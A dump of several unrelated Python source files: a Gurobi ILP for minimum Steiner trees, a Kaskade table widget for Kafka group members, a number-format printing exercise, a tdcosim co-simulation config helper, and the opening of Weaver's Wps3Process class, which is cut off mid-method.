id | content
---|---
498842
|
from gurobipy import Model, GRB, quicksum
import networkx as nx
def create_model(G, terminals, root=None, weight='weight', warmstart=[], lower_bound=None):
r""" Create an ILP for the minimum Steiner tree problem in graphs.
This formulation enforces a cycle in the solution if it is not connected.
Cycles are then forbidden by enforcing an increasing labelling along the edges of the solution.
To this end, the formulation is working with a directed graph internally.
As a slight modification of :obj:`graphilp.network.steiner_linear`, the constraints enforce
that the labels increase by one along each edge in the solution.
:param G: a weighted :py:class:`~graphilp.imports.ilpgraph.ILPGraph`
:param terminals: a list of nodes that need to be connected by the Steiner tree
:param root: a terminal chosen as the root of the Steiner tree
:param weight: name of the argument in the edge dictionary of the graph used to store edge cost
:param warmstart: a list of edges forming a tree in G connecting all terminals
:param lower_bound: give a known lower bound to the solution length
:return: a `gurobipy model <https://www.gurobi.com/documentation/9.1/refman/py_model.html>`_
ILP:
Let :math:`n = |V|` be the number of vertices in :math:`G`, :math:`T` the set of terminals,
and :math:`r` be a terminal chosen as the root of the Steiner tree.
Further, let :math:`\overrightarrow{E} := \{(u, v), (v, u) \mid \{u, v\} \in E\}`
be the directed edge set used in the internal representation.
.. math::
:nowrap:
\begin{align*}
\min \sum_{(u,v) \in \overrightarrow{E}} w_{uv} x_{uv}\\
\text{s.t.} &&\\
\forall \{u,v\} \in E: x_{uv} + x_{vu} \leq 1 && \text{(restrict edges to one direction)}\\
\ell_r = 1 && \text{(root label is set to 1)}\\
\forall t \in T: x_t = 1 && \text{(require terminals to be chosen)}\\
\sum_{v \in V} x_v - \sum_{(u, v) \in \overrightarrow{E}} x_{uv} = 1 && \text{(enforce cycle when graph}\\
&& \text{is not connected)}\\
\forall \{u,v\}\in E: 2(x_{uv}+x_{vu}) - x_u - x_v \leq 0 && \text{(require vertices to be chosen}\\
&& \text{when edge is chosen)}\\
\forall i \in V: x_i-\sum_{u=i \vee v=i}x_{uv} \leq 0 && \text{(forbid isolated nodes)}\\
\forall \{u,v\}\in E: \ell_v - 2nx_{vu} \leq \ell_u + 1 + 2n(1-x_{uv}) && \text{(enforce increasing labels)}\\
\forall \{u,v\}\in E: \ell_u + 1 \leq 2nx_{vu} + \ell_v + 2n(1-x_{uv}) && \text{(enforce increasing labels)}\\
\forall \{u,v\}\in E: \ell_u - 2nx_{uv} \leq \ell_v + 1 + 2n(1-x_{vu}) && \text{(enforce increasing labels)}\\
\forall \{u,v\}\in E: \ell_v + 1 \leq 2nx_{uv} + \ell_u + 2n(1-x_{vu}) && \text{(enforce increasing labels)}\\
\forall v \in V: \ell_v - n x_v \leq 1&& \text{(set label to 1 when}\\
&& \text{vertex is not chosen)}\\
\forall v \in V: \sum_{(u,v) \in \overrightarrow{E}} x_{uv} \leq 1 && \text{(only one arrow into each vertex)}\\
\end{align*}
Example:
.. list-table::
:widths: 50 50
:header-rows: 0
* - .. image:: images/example_steiner.png
- `Steiner trees <https://github.com/VF-DE-CDS/GraphILP-API/blob/develop/graphilp/examples/SteinerTreesOnStreetmap.ipynb>`_
Find the shortest tree connecting a given set of nodes in a graph.
"""
# create model
m = Model("Steiner Tree")
n = G.G.number_of_nodes()
# If no root is specified, set it to be the first terminal in the terminals list
if (root is None):
root = terminals[0]
G.set_node_vars(m.addVars(G.G.nodes(), vtype=GRB.BINARY))
edge_set = set(G.G.edges())
edge_set = edge_set.union({(v, u) for u, v in edge_set})
G.set_edge_vars(m.addVars(edge_set, vtype=GRB.BINARY))
# node label variables used to avoid cycles
G.set_label_vars(m.addVars(G.G.nodes(), vtype=GRB.INTEGER, lb=1))
m.update()
# abbreviations
edges = G.edge_variables
nodes = G.node_variables
labels = G.label_variables
edge2var = dict(zip(edges.keys(), edges.values()))
# set objective: minimise the sum of the weights of edges selected for the solution
m.setObjective(quicksum([edge_var * G.G.edges[edge][weight] for edge, edge_var in edges.items()]), GRB.MINIMIZE)
# Each terminal and especially the root has to be chosen.
for node, node_var in nodes.items():
# the outer loop makes sure that terminals that are not in the graph are ignored
if node in terminals:
m.addConstr(node_var == 1)
        if node == root:
            # root needs to be chosen (it is a terminal, so this matches the constraint above)
            m.addConstr(node_var == 1)
            # Label of the root needs to be set to 1
            m.addConstr(labels[node] == 1)
# enforce cycle when graph is not connected
m.addConstr(quicksum(nodes.values()) - quicksum(edges.values()) == 1)
# at most one direction per edge can be chosen
m.addConstrs(edges[(u, v)] + edges[(v, u)] <= 1 for u, v in G.G.edges())
# if edge is chosen, both adjacent nodes need to be chosen
m.addConstrs(2*(edges[(u, v)] + edges[(v, u)]) - nodes[u] - nodes[v] <= 0 for u, v in G.G.edges())
# prohibit isolated vertices
for node, node_var in nodes.items():
edge_vars = []
for edge, edge_var in edges.items():
# If the node is startpoint or endpoint of the edge, add the edge
# to the array of edge variables
            # Since the edges variable contains both directions, we can write this much more
            # concisely than in the previous formulation
if (node == edge[0] or node == edge[1]):
edge_vars.append(edge_var)
m.addConstr(node_var - quicksum(edge_vars) <= 0)
# labeling constraints: enforce increasing labels in edge direction of selected edges
for u, v in G.G.edges():
m.addConstr(labels[v] - 2 * n * edges[(v, u)] <= labels[u] + 1 + 2*n*(1 - edges[(u, v)]))
m.addConstr(labels[u] + 1 <= 2*n*edges[(v, u)] + labels[v] + 2*n*(1 - edges[(u, v)]))
m.addConstr(labels[u] - 2*n*edges[(u, v)] <= labels[v] + 1 + 2*n*(1 - edges[(v, u)]))
m.addConstr(labels[v] + 1 <= 2*n*edges[(u, v)] + labels[u] + 2*n*(1 - edges[(v, u)]))
# set label to 1 if node is not chosen
for v in G.G.nodes():
m.addConstr(labels[v] - n * nodes[v] <= 1)
# allow only one arrow into each node
for node in nodes:
constraint_edges = [(u, v) for (u, v) in edges.keys() if v == node]
m.addConstr(quicksum([edges[e] for e in constraint_edges]) <= 1)
# set lower bound
if lower_bound:
m.addConstr(quicksum([edge_var * G.G.edges[edge][weight] for edge, edge_var in edges.items()]) >= lower_bound)
# set warmstart
if len(warmstart) > 0:
# Initialise warmstart by excluding all edges and vertices from solution:
for edge_var in edges.values():
edge_var.Start = 0
for node_var in nodes.values():
node_var.Start = 0
for label_var in labels.values():
label_var.Start = 1
# Include all edges and vertices from the warmstart in the solution
# and set vertex labels:
start_node = warmstart[0][0]
warmstart_tree = nx.Graph()
warmstart_tree.add_edges_from(warmstart)
label = {start_node: 1}
labels[start_node].Start = 1
bfs = nx.bfs_edges(warmstart_tree, start_node)
for e in bfs:
label[e[1]] = label[e[0]] + 1
labels[e[1]].Start = label[e[1]]
edges[e].Start = 1
nodes[e[0]].Start = 1
nodes[e[1]].Start = 1
m.update()
return m
def extract_solution(G, model):
r""" Get the optimal Steiner tree in G
:param G: a weighted :py:class:`~graphilp.imports.ilpgraph.ILPGraph`
:param model: a solved Gurobi model for the minimum Steiner tree problem
:return: the edges of an optimal Steiner tree connecting all terminals in G
"""
solution = []
for edge, edge_var in G.edge_variables.items():
if edge_var.X > 0.5:
solution.append(edge)
return solution
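# --- Hedged usage sketch (not part of the original module) ---
# Assumes an ILPGraph wrapper can be obtained from a NetworkX graph via
# graphilp.imports.networkx.read; adjust the import if your GraphILP version
# names it differently.
#
#   import networkx as nx
#   from graphilp.imports import networkx as imp_nx
#
#   nx_graph = nx.petersen_graph()
#   nx.set_edge_attributes(nx_graph, 1, 'weight')
#   ilp_graph = imp_nx.read(nx_graph)
#
#   terminals = [0, 3, 7]
#   model = create_model(ilp_graph, terminals)
#   model.optimize()
#   tree_edges = extract_solution(ilp_graph, model)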
|
498845
|
from typing import List
from rich.table import Table
from kaskade.kafka.models import GroupMember
from kaskade.renderables.paginated_table import PaginatedTable
class MembersTable(PaginatedTable):
def __init__(
self,
group_members: List[GroupMember],
page_size: int = -1,
page: int = 1,
row: int = 0,
) -> None:
self.group_members = group_members
super().__init__(len(group_members), page_size=page_size, page=page, row=row)
def renderables(self, start_index: int, end_index: int) -> List[GroupMember]:
return self.group_members[start_index:end_index]
def render_rows(self, table: Table, renderables: List[GroupMember]) -> None:
for group_member in renderables:
table.add_row(
str(group_member.group),
str(group_member.id),
str(group_member.client_id),
str(group_member.client_host),
)
def render_columns(self, table: Table) -> None:
header_style = "bright_magenta bold"
table.add_column("group", header_style=header_style, ratio=35, no_wrap=True)
table.add_column("id", header_style=header_style, ratio=35, no_wrap=True)
table.add_column("client id", header_style=header_style, ratio=15, no_wrap=True)
table.add_column(
"client host", header_style=header_style, ratio=15, no_wrap=True
)
|
498892
|
def print_formatted(number):
    # pad every column to the width of the binary representation of `number`
    width = len(bin(number)) - 2
    for i in range(1, number + 1):
        print(str(i).rjust(width), oct(i)[2:].rjust(width),
              hex(i)[2:].upper().rjust(width), bin(i)[2:].rjust(width))


if __name__ == '__main__':
    n = int(input())
    print_formatted(n)
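# For example, print_formatted(5) pads every column to len(bin(5)[2:]) == 3
# characters and prints decimal, octal, hexadecimal and binary side by side:
#
#   1   1   1   1
#   2   2   2  10
#   3   3   3  11
#   4   4   4 100
#   5   5   5 101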
|
498929
|
import json
import uuid
import pdb
import os
from pprint import pprint
from tdcosim.global_data import GlobalData
#===================================================================================================
#==============================================CONFIG===============================================
#===================================================================================================
class ConfigHelper(object):
"""A class to help the user create config for cosimulation.
	Most methods are named add_* and remove_*. add_* adds a
	particular configuration while remove_* will undo the change.
	There are also read, write, show and validate methods to
read an existing config file, write the current self.data
to a file, show the contents of self.data and validate the
configuration in self.data.
Typical usage,
foo=ConfigHelper()
foo.add_*()
foo.validate()
foo.write()"""
def __init__(self):
self.data={}
return None
#===================================================================================================
def add_psseconfig(self,rawFilePath,dyrFilePath, installLocation):
try:
psseConfig=self.data['psseConfig']={}
psseConfig['rawFilePath']=rawFilePath
psseConfig['dyrFilePath']=dyrFilePath
psseConfig['installLocation']=installLocation
except:
GlobalData.log()
#===================================================================================================
def remove_psseconfig(self):
try:
self.data.pop('psseConfig')
except:
GlobalData.log()
#===================================================================================================
def add_cosimhome(self,cosimHome):
try:
self.data['cosimHome']=cosimHome
except:
GlobalData.log()
#===================================================================================================
def remove_cosimhome(self):
try:
self.data.pop('cosimHome')
except:
GlobalData.log()
#===================================================================================================
def add_defaultfeederconfig(self,filePath,solarFlag,solarPenetration):
try:
if 'openDSSConfig' not in self.data:
self.data['openDSSConfig']={}
defConf=self.data['openDSSConfig']['defaultFeederConfig']={}
defConf['filePath']=filePath
defConf['solarFlag']=solarFlag
defConf['solarPenetration']=solarPenetration
except:
GlobalData.log()
#===================================================================================================
def remove_defaultfeederconfig(self):
try:
self.data['openDSSConfig'].pop('defaultFeederConfig')
except:
GlobalData.log()
#===================================================================================================
def add_manualfeederconfig(self,nodenumber,filePath,solarFlag,DERFilePath,initializeWithActual,
DERSetting,DERModelType,PVPlacement,
defaultDERParameters={"solarPenetration":0.02,"derId":"50","powerRating":50,
"VrmsRating":177.0,"steadyStateInitialization":True,"pvderScale": 1}):
"""Each input should be a list such that the entries in the list index should match.
for ex:nodenumber=[1,2],filePath=['case13.dss','case123.dss'],solarFlag=[0,1],
solarPenetration=[0,50] implies case13.dss is attached to transmission bus 1 and that there
is no solar generation in the distribution system."""
try:
if 'openDSSConfig' not in self.data:
self.data['openDSSConfig']={}
if 'manualFeederConfig' not in self.data['openDSSConfig']:
self.data['openDSSConfig']['manualFeederConfig']={}
self.data['openDSSConfig']['manualFeederConfig']['nodes']=[]
data=self.data['openDSSConfig']['manualFeederConfig']['nodes']
for i in range(len(nodenumber)):
thisNodeData={'DERParameters':{}}
thisNodeData['nodenumber']=nodenumber[i]
thisNodeData['filePath']=[filePath[i]]
thisNodeData['solarFlag']=solarFlag[i]
thisNodeData['DERFilePath']=DERFilePath[i]
thisNodeData['initializeWithActual']=initializeWithActual[i]
thisNodeData['DERSetting']=DERSetting[i]
thisNodeData['DERModelType']=DERModelType[i]
thisNodeData['DERParameters']['PVPlacement']=PVPlacement[i]
thisNodeData['DERParameters']['default']=defaultDERParameters
data.append(thisNodeData)
except:
GlobalData.log()
#===================================================================================================
def remove_manualfeederconfig(self):
try:
self.data['openDSSConfig'].pop('manualFeederConfig')
except:
GlobalData.log()
#===================================================================================================
def add_derparameters(self,nodenumber,solarPenetration,derId,powerRating=50.0,VrmsRating=177.0,
steadyStateInitialization=True,pvderScale=1):
"""Add DER parameters to a given nodenumber (nodeID/busID/busNumber)"""
try:
assert 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig'],"""
Please use add_manualfeederconfig method to define nodes at which solar is present
before running this method."""
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
derprop=targetnode['DERParameters']={}#overwrite even if previous data exists
default=derprop['default']={}
default['solarPenetration'] = solarPenetration
default['derId'] = derId
default['powerRating'] = powerRating
default['VrmsRating'] = VrmsRating
default['steadyStateInitialization'] = steadyStateInitialization
default['pvderScale'] = pvderScale
except:
GlobalData.log()
#===================================================================================================
def remove_derparameters(self,nodenumber):
"""Remove DER parameters of a given nodenumber (nodeID/busID/busNumber)"""
try:
if 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig']:
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode, """
			Can't find the DERParameters according to the given nodenumber"""
targetnode.pop('DERParameters')
except:
GlobalData.log()
#===================================================================================================
def add_LVRT(self,nodenumber,LVRTkey,V_threshold,t_threshold,mode):
"""Each inputs of the LVRT except nodenumber should be a list such that the entries in
the list index should match.
for ex:LVRTkey=["1","2"],V_threshold=[0.6,0.7],t_threshold=[1.0,1.0],
mode=['mandatory_operation','mandatory_operation']
implies LVRT 1 and 2 are attached to transmission bus [nodenumber] and that LVRTs
will operate as mandatory operation with V and t threshholds"""
try:
assert 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig'],"""
Please use add_manualfeederconfig method to define nodes at which solar is present
before running this method."""
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode and \
'default' in targetnode['DERParameters'], """
			Can't find the DERParameters according to the given nodenumber"""
default=targetnode['DERParameters']['default']
LVRT = default['LVRT'] = {} #overwrite even if previous data exists
for i in range(len(LVRTkey)):
LVRT[LVRTkey[i]] = {}
LVRT[LVRTkey[i]]['V_threshold'] = V_threshold[i]
LVRT[LVRTkey[i]]['t_threshold'] = t_threshold[i]
LVRT[LVRTkey[i]]['mode'] = mode[i]
except:
GlobalData.log()
#===================================================================================================
def remove_LVRT(self,nodenumber):
"""Remove LVRT of a given nodenumber (nodeID/busID/busNumber)"""
try:
if 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig']:
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode and \
'default' in targetnode['DERParameters'], """
			Can't find the DERParameters according to the given nodenumber"""
targetnode['DERParameters']['default'].pop('LVRT')
except:
GlobalData.log()
#===================================================================================================
def add_HVRT(self,nodenumber,HVRTkey,V_threshold,t_threshold,mode):
"""Each inputs of the HVRT except nodenumber should be a list such that the entries in
the list index should match.
for ex:HVRTkey=["1","2"],V_threshold=[0.6,0.7],t_threshold=[1.0,1.0],
mode=['mandatory_operation','mandatory_operation']
implies HVRT 1 and 2 are attached to transmission bus [nodenumber] and that HVRTs
will operate as mandatory operation with V and t threshholds"""
try:
assert 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig'],"""
Please use add_manualfeederconfig method to define nodes at which solar is present
before running this method."""
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode and \
'default' in targetnode['DERParameters'], """
			Can't find the DERParameters according to the given nodenumber"""
default=targetnode['DERParameters']['default']
HVRT = default['HVRT'] = {} #overwrite even if previous data exists
for i in range(len(HVRTkey)):
HVRT[HVRTkey[i]] = {}
HVRT[HVRTkey[i]]['V_threshold'] = V_threshold[i]
HVRT[HVRTkey[i]]['t_threshold'] = t_threshold[i]
HVRT[HVRTkey[i]]['mode'] = mode[i]
except:
GlobalData.log()
#===================================================================================================
def remove_HVRT(self,nodenumber):
"""Remove HVRT of a given nodenumber (nodeID/busID/busNumber)"""
try:
if 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig']:
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode and \
'default' in targetnode['DERParameters'], """
			Can't find the DERParameters according to the given nodenumber"""
targetnode['DERParameters']['default'].pop('HVRT')
except:
GlobalData.log()
#===================================================================================================
def add_PVPlacement(self,nodenumber,PVPlacementkey,derId,powerRating,pvderScale):
"""Each inputs of the PVPlacement except nodenumber should be a list such that the entries in
the list index should match.
for ex:PVPlacementkey=["25","13"],derId=[50,50],powerRating=[50,50],
pvderScale=[1,1]
implies DER will attached to distribution node 25 and 13 in transmission bus [nodenumber]
and that the both DER will operate as DER setting as DERid 50, powerRating 50, and pvderScale 1"""
try:
assert 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig'],"""
Please use add_manualfeederconfig method to define nodes at which solar is present
before running this method."""
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode, """
			Can't find the DERParameters according to the given nodenumber"""
DERParameters=targetnode['DERParameters']
PVPlacement = DERParameters['PVPlacement'] = {} #overwrite even if previous data exists
for i in range(len(PVPlacementkey)):
PVPlacement[PVPlacementkey[i]] = {}
PVPlacement[PVPlacementkey[i]]['derId'] = derId[i]
PVPlacement[PVPlacementkey[i]]['powerRating'] = powerRating[i]
PVPlacement[PVPlacementkey[i]]['pvderScale'] = pvderScale[i]
except:
GlobalData.log()
#===================================================================================================
	def remove_PVPlacement(self,nodenumber):
		"""Remove PVPlacement of a given nodenumber (nodeID/busID/busNumber)"""
try:
if 'openDSSConfig' in self.data and \
'manualFeederConfig' in self.data['openDSSConfig'] and \
'nodes' in self.data['openDSSConfig']['manualFeederConfig']:
nodes=self.data['openDSSConfig']['manualFeederConfig']['nodes']
targetnode={}
for n in range(len(self.data['openDSSConfig']['manualFeederConfig']['nodes'])):
if nodes[n]['nodenumber'] == nodenumber:
targetnode = nodes[n]
break;
assert 'DERParameters' in targetnode, """
			Can't find the DERParameters according to the given nodenumber"""
targetnode['DERParameters'].pop('PVPlacement')
except:
GlobalData.log()
#===================================================================================================
def add_simulationconfig(self,simType,protocol='loose_coupling',memoryThreshold=100.0):
try:
if 'simulationConfig' not in self.data:
self.data['simulationConfig']={}
simConf=self.data['simulationConfig']
simConf['simType']=simType
simConf['protocol']=protocol
simConf['memoryThreshold']=memoryThreshold
except:
GlobalData.log()
#===================================================================================================
def remove_simulationconfig(self):
try:
self.data.pop('simulationConfig')
except:
GlobalData.log()
#===================================================================================================
def add_loadshape(self,loadShape):
try:
if 'simulationConfig' not in self.data:
self.data['simulationConfig']={}
self.data['simulationConfig']['staticConfig']={}
self.data['simulationConfig']['staticConfig']['loadShape']=loadShape
except:
GlobalData.log()
#===================================================================================================
def remove_loadshape(self):
try:
self.data['simulationConfig']['staticConfig'].pop('loadShape')
except:
GlobalData.log()
#===================================================================================================
def add_fault(self,faultBus,faultImpedance,faultOnTime,faultOffTime):
try:
if 'simulationConfig' not in self.data:
self.data['simulationConfig']={}
if 'dynamicConfig' not in self.data['simulationConfig']:
self.data['simulationConfig']['dynamicConfig']={}
self.data['simulationConfig']['dynamicConfig']['events']={}
events=self.data['simulationConfig']['dynamicConfig']['events']
if events.keys():
prevEvents=[]
for entry in events.keys():
prevEvents.append(int(entry))
else:
prevEvents=[0]
nextEvent=max(prevEvents)+1
events[str(nextEvent)]={}
events[str(nextEvent)]['time'],events[str(nextEvent)]['faultBus'],\
events[str(nextEvent)]['faultImpedance']=faultOnTime,faultBus,faultImpedance
events[str(nextEvent)]['type']='faultOn'
events[str(nextEvent+1)]={}
events[str(nextEvent+1)]['time']=faultOffTime
events[str(nextEvent+1)]['faultBus']=faultBus
events[str(nextEvent+1)]['type']='faultOff'
except:
GlobalData.log()
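	# Illustrative sketch (hypothetical bus number and impedance values): calling
	# add_fault(faultBus=101, faultImpedance=[0.0, 0.0], faultOnTime=1.0, faultOffTime=1.2)
	# on an otherwise empty config leaves
	# self.data['simulationConfig']['dynamicConfig']['events'] as
	# {'1': {'time': 1.0, 'faultBus': 101, 'faultImpedance': [0.0, 0.0], 'type': 'faultOn'},
	#  '2': {'time': 1.2, 'faultBus': 101, 'type': 'faultOff'}}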
#===================================================================================================
def remove_fault(self,faultBus,faultOnTime,faultOffTime):
try:
events=self.data['simulationConfig']['dynamicConfig']['events']
popID=[]
for entry in events:
if events[entry]['faultBus']==faultBus and events[entry]['type']=='faultOn' and \
events[entry]['time']==faultOnTime:
popID.append(entry)
if events[entry]['faultBus']==faultBus and events[entry]['type']=='faultOff' and \
events[entry]['time']==faultOffTime:
popID.append(entry)
for entry in popID:
events.pop(entry)
except:
GlobalData.log()
#===================================================================================================
def add_simend(self,simEndTime):
try:
if 'simulationConfig' not in self.data:
self.data['simulationConfig']={}
if 'dynamicConfig' not in self.data['simulationConfig']:
self.data['simulationConfig']['dynamicConfig']={}
if 'events' not in self.data['simulationConfig']['dynamicConfig']:
self.data['simulationConfig']['dynamicConfig']['events']={}
events=self.data['simulationConfig']['dynamicConfig']['events']
if events.keys():
prevEvents=[]
for entry in events.keys():
prevEvents.append(int(entry))
else:
prevEvents=[0]
nextEvent=max(prevEvents)+1
			events[str(nextEvent)]={}
			events[str(nextEvent)]['type']='simEnd'
			events[str(nextEvent)]['time']=simEndTime
except:
GlobalData.log()
#===================================================================================================
def remove_simend(self):
try:
assert 'events' in self.data['simulationConfig']['dynamicConfig'],"add events first"
events=self.data['simulationConfig']['dynamicConfig']['events']
			# iterate over a copy of the keys since entries may be removed while looping
			for entry in list(events):
				if events[entry]['type']=='simEnd':
					events.pop(entry)
except:
GlobalData.log()
#===================================================================================================
def add_outputconfig(self,outputDir,simID=None,outputFileName='report.xlsx',outputFileType='xlsx'):
try:
if not simID:
simID=uuid.uuid4().hex
if 'outputConfig' not in self.data:
self.data['outputConfig']={}
self.data['outputConfig']['outputDir']=outputDir
self.data['outputConfig']['simID']=simID
self.data['outputConfig']['outputfilename']=outputFileName
self.data['outputConfig']['type']=outputFileType
except:
GlobalData.log()
#===================================================================================================
def remove_outputconfig(self):
try:
self.data.pop('outputConfig')
except:
GlobalData.log()
#===================================================================================================
def write(self,fpath):
"""Will write the configuration data in self.data to the given filename."""
try:
			dirName=os.path.dirname(fpath)
			if dirName and not os.path.exists(dirName):
				os.makedirs(dirName)
json.dump(self.data,open(fpath,'w'),indent=3)
except:
GlobalData.log()
#===================================================================================================
def read(self,fpath):
"""Will load the config data from an existing config file.
Use this method to make modifications to an existing file.
P.S. This will overwrite self.data."""
try:
self.data=json.load(open(fpath))
except:
GlobalData.log()
#===================================================================================================
def show(self):
"""Will print out the configuration data in self.data"""
try:
pprint(self.data)
except:
GlobalData.log()
#===================================================================================================
def validate(self):
"""Validates if the provided settings are valid.
P.S. Validity in this context simply means that the provided options
satisfy the minimum requirements. When the config options are validated
by this method it does not mean that the cosimulation will run without
errors. For instance, this method does not verify, if a given filepath
exists.
P.S. This method will not find the issues when used in optimized mode
i.e. python -O foo.py or python -OO foo.py
Sample call: self.validate() will return without error when config is correct."""
try:
#join is used for better formatting while using GlobalData.log()
assert 'cosimHome' in self.data and self.data['cosimHome'],\
''.join(['cosimHome missing.\n','Please use add_cosimhome'])
assert 'psseConfig' in self.data,\
''.join(['psseConfig key is missing.\n','Please add pssConfig'])
assert 'installLocation' in self.data['psseConfig'] and \
'rawFilePath' in self.data['psseConfig'] and \
'dyrFilePath' in self.data['psseConfig'],\
''.join(['psse properties are missing.\n','Please add pssConfig properties'])
assert ('defaultFeederConfig' in self.data['openDSSConfig'] and \
len(self.data['openDSSConfig']['defaultFeederConfig'])>0) or \
len(self.data['openDSSConfig']['manualFeederConfig'])>0,\
''.join(['Either default feeder config or manual feeder config should be set.\n',\
'Use add_defaultfeederconfig or add_manualfeederconfig.'])
assert 'simulationConfig' in self.data,\
''.join(['simulation config missing.\n',\
'Use add_simulationconfig method to add simulation config.'])
assert 'simType' in self.data['simulationConfig'],\
''.join(['Simulation type missing.\n',\
'Use add_simulationconfig method to define simulation type.'])
assert 'outputConfig' in self.data,\
''.join(['output config not set.\n',\
'Use add_outputconfig method to set it.'])
return True
except:
GlobalData.log()
return False
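# --- Hedged usage sketch (file paths below are placeholders, not shipped examples) ---
# config = ConfigHelper()
# config.add_cosimhome(r'C:\cosim')
# config.add_psseconfig(r'C:\cosim\data\case.raw', r'C:\cosim\data\case.dyr', r'C:\Program Files\PTI\PSSE35\PSSBIN')
# config.add_defaultfeederconfig(r'C:\cosim\data\case13.dss', solarFlag=1, solarPenetration=0.2)
# config.add_simulationconfig(simType='dynamic')
# config.add_simend(simEndTime=10.0)
# config.add_outputconfig(outputDir=r'C:\cosim\output')
# if config.validate():
#     config.write(r'C:\cosim\config\test_config.json')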
|
498959
|
import logging
import warnings
from copy import deepcopy
from time import sleep
from typing import TYPE_CHECKING
from pyramid.httpexceptions import (
HTTPConflict,
HTTPForbidden,
HTTPInternalServerError,
HTTPNotFound,
HTTPOk,
HTTPUnauthorized
)
from pyramid.settings import asbool
from weaver import status
from weaver.exceptions import PackageExecutionError
from weaver.execute import EXECUTE_MODE_ASYNC, EXECUTE_RESPONSE_DOCUMENT, EXECUTE_TRANSMISSION_MODE_REFERENCE
from weaver.formats import CONTENT_TYPE_APP_FORM, CONTENT_TYPE_APP_JSON
from weaver.processes import opensearch
from weaver.processes.constants import OPENSEARCH_LOCAL_FILE_SCHEME
from weaver.processes.sources import get_data_source_from_url, retrieve_data_source_url
from weaver.processes.utils import map_progress
from weaver.processes.wps_process_base import WpsProcessInterface
from weaver.utils import (
fetch_file,
get_any_id,
get_any_message,
get_any_value,
get_job_log_msg,
get_log_monitor_msg,
pass_http_error,
request_extra
)
from weaver.visibility import VISIBILITY_PUBLIC
from weaver.warning import MissingParameterWarning
from weaver.wps.utils import map_wps_output_location
from weaver.wps_restapi import swagger_definitions as sd
if TYPE_CHECKING:
from typing import List, Union
from pywps.app import WPSRequest
from weaver.typedefs import JSON, UpdateStatusPartialFunction
LOGGER = logging.getLogger(__name__)
REMOTE_JOB_PROGRESS_PROVIDER = 1
REMOTE_JOB_PROGRESS_PREPARE = 2
REMOTE_JOB_PROGRESS_DEPLOY = 3
REMOTE_JOB_PROGRESS_VISIBLE = 4
REMOTE_JOB_PROGRESS_READY = 5
REMOTE_JOB_PROGRESS_EXECUTION = 9
REMOTE_JOB_PROGRESS_MONITORING = 10
REMOTE_JOB_PROGRESS_FETCH_OUT = 90
REMOTE_JOB_PROGRESS_COMPLETED = 100
class Wps3Process(WpsProcessInterface):
def __init__(self,
step_payload, # type: JSON
joborder, # type: JSON
process, # type: str
request, # type: WPSRequest
update_status, # type: UpdateStatusPartialFunction
):
super(Wps3Process, self).__init__(request)
self.provider = None # overridden if data source properly resolved
self.update_status = lambda _message, _progress, _status: update_status(
self.provider, _message, _progress, _status)
self.provider, self.url, self.deploy_body = self.resolve_data_source(step_payload, joborder)
self.process = process
def resolve_data_source(self, step_payload, joborder):
try:
# Presume that all EOImage given as input can be resolved to the same ADES
# So if we got multiple inputs or multiple values for an input, we take the first one as reference
eodata_inputs = opensearch.get_eo_images_ids_from_payload(step_payload)
data_url = "" # data_source will be set to the default ADES if no EOImages (anything but `None`)
if eodata_inputs:
step_payload = opensearch.alter_payload_after_query(step_payload)
value = joborder[eodata_inputs[0]]
if isinstance(value, list):
value = value[0] # Use the first value to determine the data source
data_url = value["location"]
reason = "(ADES based on {0})".format(data_url)
else:
reason = "(No EOImage -> Default ADES)"
data_source = get_data_source_from_url(data_url)
deploy_body = step_payload
url = retrieve_data_source_url(data_source)
except (IndexError, KeyError) as exc:
raise PackageExecutionError("Failed to save package outputs. [{!r}]".format(exc))
self.provider = data_source # fix immediately for `update_status`
self.update_status("{provider} is selected {reason}.".format(provider=data_source, reason=reason),
REMOTE_JOB_PROGRESS_PROVIDER, status.STATUS_RUNNING)
return data_source, url, deploy_body
def get_user_auth_header(self):
# TODO: find a better way to generalize this to Magpie credentials?
if not asbool(self.settings.get("ades.use_auth_token", True)):
return {}
